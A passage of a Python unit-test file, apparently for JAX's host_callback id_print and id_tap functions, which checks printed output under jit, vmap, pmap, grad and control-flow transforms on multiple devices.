backend = api.lib.xla_bridge.get_backend()
c = api.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 CPU devices on CPU (due to the flag), also
on TPU (due to how the TPU tests are set up), but only 1 device on
GPU. We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we rewrite the device names to match.
"""
assert api.device_count() in (1, 2)
expected = expected_2CPUs
if api.device_count() == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(api.devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackIdTapTest(jtu.JaxTestCase):
def setUp(self):
testing_stream.reset()
testing_stream.test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
super().setUp()
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTest.tearDown")
def test_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
testing_stream.reset()
def test_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00
b=9.00 }""", testing_stream.output)
testing_stream.reset()
def test_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
testing_stream.reset()
def test_print_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00
9.00 )""")
testing_stream.reset()
def test_eval_tap_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_jit_simple(self):
jit_fun1 = api.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
testing_stream.reset()
def test_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, api.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
testing_stream.reset()
def test_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
api.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
api.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
testing_stream.reset()
def test_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
testing_stream.reset()
def test_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = api.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
testing_stream.reset()
def test_jit_devices(self):
"""Running on multiple devices."""
devices = api.local_devices()
logging.info(f"{self._testMethodName}: has devices {devices}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in devices:
self.assertEqual(112, api.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(len(devices), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(len(devices), len(re.findall(r"112", testing_stream.output)))
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = api.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_multiple_tap(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() == "gpu":
# TODO(necula): it seems that on GPU if multiple host threads run
# a jit computation, the multiple computations are interleaved on the
# GPU. This can result in the outfeed trains being interleaved, which
# will trigger an error. The solution is to fix on GPU the receiving
# logic so that we can outfeed the train as one tuple, and receive it
# one piece as a time. Then the trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
api.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap.
@jtu.skip_on_devices("gpu")
def test_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
api.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
testing_stream.reset()
def test_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = api.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{dtype}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_jit_types(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"id_print jit not implemented for {dtype}.")
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = api.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res)
def test_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
api.jit(hcb.id_print)(arg)
def test_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
api.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_jit_interleaving(self):
    # Several jit invocations without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += api.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_jit_tap_exception(self):
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = api.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
testing_stream.reset()
def test_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jvp(self):
jvp_fun1 = lambda x, xt: api.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00
0.20 )
transforms: ['jvp'] what: y * 3
( 30.00
0.60 )""", testing_stream.output)
testing_stream.reset()
def test_grad_primal_unused(self):
if not config.omnistaging_enabled:
raise SkipTest("Test requires omnistaging")
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
jaxpr = str(api.make_jaxpr(grad_func)(5.))
# making the Jaxpr does not print anything
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ lambda ; a.
let b = mul a 3.00
c = id_tap[ arg_treedef_=*
tap_func_=_print what='x * 3')
transforms=( ) ] b
_ = mul c 2.00
d = mul 1.00 2.00
e = id_tap[ arg_treedef_=*
tap_func_=_print what='x * 3')
transforms=(('jvp',), ('transpose',)) ] d
f = mul e 3.00
in (f,) }""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(jnp.float32(5.))
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
testing_stream.reset()
def test_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
testing_stream.reset()
def test_grad_grad(self):
if not config.omnistaging_enabled:
raise SkipTest("Test requires omnistaging")
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = api.grad(api.grad(func))
# making the Jaxpr does not print anything
_ = api.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = api.grad(func)
print(api.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00
15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00
0.00 )""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = api.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00
2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00
False )""", testing_stream.output)
testing_stream.reset()
def test_vmap(self):
vmap_fun1 = api.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
testing_stream.reset()
def test_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = api.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00
[4.00 5.00] )""", testing_stream.output)
testing_stream.reset()
def test_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return api.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return api.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(api.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
testing_stream.reset()
def test_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: x < 2,
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(np.array([2, 2, 2, 3, 4]), api.jit(api.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
def test_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = api.jit(api.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
testing_stream.reset()
@skipIf(not config.omnistaging_enabled,
"test works only with omnistaging enabled")
def test_composed(self):
def power(x, n):
x, n = hcb.id_print((x, n), output_stream=testing_stream)
return x * x * n * x
def f(x, n):
return x * power(x + 1., n)
x = 3.
print("impl = ", f(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("jvp = ", api.jvp(lambda x: f(x, 2.), (x,), (1.,)))
hcb.barrier_wait()
expected = """
transforms: ['jvp']
( ( 4.
2. )
( 1.
0. ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print("grad = ", api.grad(f)(x, 2.))
hcb.barrier_wait()
expected = """
( 4.
2. )
transforms: ['jvp', 'transpose']
( 288.
192. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
xv = np.array([3., 4.])
print("vmap o grad = ", api.vmap(api.grad(f))(xv, np.array([2., 3.])))
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})]
( [4. 5.]
[2. 3.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (0, 0)})]
( [288. 900.]
[192. 500.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_pmap(self):
xv = jnp.arange(api.device_count(), dtype=jnp.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_fun1 = api.pmap(partial(fun1, do_print=True))
res = pmap_fun1(xv)
hcb.barrier_wait()
expected_res = api.pmap(partial(fun1, do_print=False))(xv)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: x * 2
0
device: cpu:1 what: x * 2
2""")
testing_stream.reset()
def test_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = api.device_count()
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = api.pmap(api.vmap(partial(fun1, do_print=True)))
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.vmap(partial(fun1, do_print=False)))(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
testing_stream.reset()
def test_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = api.local_device_count()
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=True))))
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = api.pmap(api.pmap(api.vmap(partial(fun1, do_print=False))))(matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
testing_stream.reset()
@ignore_jit_of_pmap_warning()
def test_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
    # A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = api.local_device_count()
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = api.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = api.pmap(partial(fun, do_print=True))(matrix)
self.assertAllClose(fun(matrix, do_print=False), res, check_dtypes=False)
hcb.barrier_wait()
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 what: before
[[1.00 2.00 3.00]]
device: cpu:0 what: inside
[2.00 4.00 6.00]
device: cpu:0 what: after
[[3.00 5.00 7.00]]
device: cpu:1 what: before
[[101.00 102.00 103.00]]
device: cpu:1 what: inside
